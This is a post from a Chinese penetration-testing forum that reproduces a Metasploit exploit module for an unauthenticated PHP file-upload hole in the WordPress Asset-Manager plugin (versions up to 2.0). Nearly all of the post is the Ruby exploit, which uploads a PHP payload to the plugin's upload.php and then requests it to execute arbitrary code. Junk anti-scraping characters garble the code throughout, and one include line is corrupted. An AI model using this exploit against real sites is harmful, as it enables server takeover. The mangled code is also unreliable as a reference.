找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 WordPress Asset-Manager PHP文件上传漏洞
返回列表 发新帖
查看: 2971|回复: 0
打印 上一主题 下一主题

WordPress Asset-Manager PHP文件上传漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-31 09:22:33 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。
/ H' m; K4 n1 P/ T6 ]$ {) ~7 q9 u; y0 t, V* j% j
##
$ e" C6 L3 Z, c/ H# This file is part of the Metasploit Framework and may be subject to% w2 m  h5 ~+ ?$ Y8 Y  F
# redistribution and commercial restrictions. Please see the Metasploit
7 z5 S3 g$ g7 n4 q4 q# Framework web site for more information on licensing and terms of use.+ w. Q1 X; J' j* g9 G+ _* j
#   http://metasploit.com/framework/# I& B$ ^% b. K: O% p8 J) E
##. j- k! ?0 U; w& c* k6 ]5 G4 e
/ I/ {5 C" H2 j
require 'msf/core'
* p3 H/ r! G2 ^% |0 k# E) L  ?8 B% nrequire 'msf/core/exploit/php_exe'0 M9 a/ i+ L, k: j2 Y2 k, N' A1 F
  x0 Z2 F) t& x6 `1 u4 f
class Metasploit3 < Msf::Exploit::Remote
8 P+ j+ Z  t8 f) g  Rank = ExcellentRanking3 `( \9 ]- [3 n  O

) k- t0 q# r$ D( N  z! b5 {. A  include Msf::Exploit::Remote::HttpClient
" T0 E2 X: j; p) n! N  include Msf::Exploit:hpEXE, ^1 ?6 a9 ]. P/ R$ u' o9 b

0 z- |) P3 s: C# x6 F  def initialize(info = {})8 t/ {# o$ E# s9 O) r
    super(update_info(info,& m( {0 G/ g# `6 P2 u  G
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',8 c6 V- z- Z- j" v, g
      'Description'    => %q{8 ]0 e$ u! ?% Q
        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress
0 `! a' |& s; I$ Q% h0 j7 y+ U        plugin.  By abusing the upload.php file, a malicious user can upload a file to a# v1 h" W& ?6 A5 M# R! E
        temp directory without authentication, which results in arbitrary code execution.( z3 T6 f5 E0 Q3 W
      },
" s/ m1 _* I( c" Q2 W  n      'Author'         =>  \4 c! R; R  u$ o# _+ v3 \3 [
        [
/ L4 c+ J3 w9 `3 I' s          'Sammy FORGIT', # initial discovery
) C  Y5 \. ^: P3 i8 g9 g8 s( I          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
% `8 I7 L, o$ E: C' I        ],
* \( @- g# p. ]2 j. H, Z      'License'        => MSF_LICENSE,
4 x# R2 p& G1 f) U* Q. e# ^' n) M      'References'     =>
3 u6 V+ Z/ g5 O4 g- S0 |        [, H- J* Z, y/ n1 l: D
          [ 'OSVDB', '82653' ],
+ w) f% h! t+ p$ x) w7 `3 V% j. h          [ 'BID', '53809' ],& @1 s9 y0 I/ b% Q" Y
          [ 'EDB', '18993' ]," P- M! R+ b; j$ q5 {) o
          [ 'URL', 'http:// www.myhack58.com /' ]+ r% J7 |: r) G3 j0 a  `1 N! ^% ^
        ],
: f# o1 K) y. O& G4 g% ]0 w      'Payload'       =>8 [+ L0 g9 d& t: g- c( ?
        {: ^- \; t4 b  s6 u) j
          'BadChars' => "\x00",
# Q: f& g7 ]- e; O7 o3 r        },
% E' b8 f( e  C5 {      'Platform'       => 'php',
4 V2 N6 l0 D5 Y0 w: ^7 P      'Arch'           => ARCH_PHP,
0 K% }* x- |% F" z0 m! h. g      'Targets'        =>
7 ~. ^2 X0 Z$ R3 \# r, Y' I7 k. z        [- u2 i$ s% e2 {7 w
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],, k& {$ W9 \, n
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]3 s, Y7 z% K+ u5 k( h5 I
        ],
. g, C; R; N4 ]! Z' l# d) ~/ Q      'DefaultTarget' => 0,) C! ]5 d- D% n
      'DisclosureDate' => 'May 26 2012'))
2 Y1 Y8 V, s' p  \
- O; s& m* x, A; \. f6 C    register_options($ C! Y( U# b; Q6 ?3 `0 U3 E
      [
/ g1 N# {' O6 o( b/ s        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
% [/ E7 C- i: h7 T      ], self.class)
0 y8 Z1 C* q! d3 Y9 Q1 I; K8 G  end
) Z. O# G; F* u& I
) n3 A7 y! x: s' E  def exploit1 R! v" K; R" N8 Q- E& B6 k- {: o
    uri =  target_uri.path
' \1 Z8 K- O/ A$ z3 R    uri << '/' if uri[-1,1] != '/'* q/ X, F# B1 [4 S) p  k
    peer = "#{rhost}:#{rport}": B" {1 P* v7 ?! X  R
    payload_name = "#{rand_text_alpha(5)}.php"7 B  J2 o3 e. H" T+ b
    php_payload = get_write_exec_payload(:unlink_self=>true): r. Y8 G! `& V& R! }6 W; R2 k

+ \0 J1 M0 x. R    data = Rex::MIME::Message.new
5 V1 n( X" X# k* V: J, x3 x2 P    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")0 \1 n5 T. t$ u/ ^. n! P0 f
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')3 b/ ~. |9 k8 l
& W( ~# t" m$ B" l, N( t  W
    print_status("#{peer} - Uploading payload #{payload_name}")1 D# P! Y& Z& A  X% D
    res = send_request_cgi({9 D2 E9 i1 q* |! @1 r
      'method'  => 'POST',& o* l% q* m" |& k# H' _: G" N
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",  t2 I! d0 U( F# N6 z1 s% U
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",4 A# h3 D$ I& R9 [' ~
      'data'    => post_data4 ~) ^" u2 m3 r4 y! H% b
    })
" E( A& E: E5 K4 o! O: G" `8 [# S
) g1 r- w, u& P( B- U/ c    if not res or res.code != 200 or res.body !~ /#{payload_name}/
" N7 w5 E9 i/ A2 V9 |% L' T1 y      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")8 I  G! M8 L" _) o5 i
end& q/ X! b" ?$ S9 O* z3 B5 r

0 P! }; y7 B; L- w1 G( ~# R    print_status("#{peer} - Executing payload #{payload_name}")
1 c* `9 b* Z# l    res = send_request_raw({+ e  t+ H5 S. `" j5 e
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",! k+ f( R( C3 ~: P$ N
      'method'  => 'GET'
: c1 N0 O5 T; t* W5 }1 U$ Z    })
3 R  O+ K9 T- s% k; T& D% `. i 8 h4 e$ m, H. {5 o
    if res and res.code != 2000 A6 F5 R0 v# W! g7 a' Y3 J
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
) e) F3 t2 c* Y    end
8 f" u9 V' l* R6 G7 h1 {  end
* {& ~9 ?2 Q+ V, C& {; k6 C6 q4 Eend
! L" k7 x9 K* }9 ]9 {' m
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表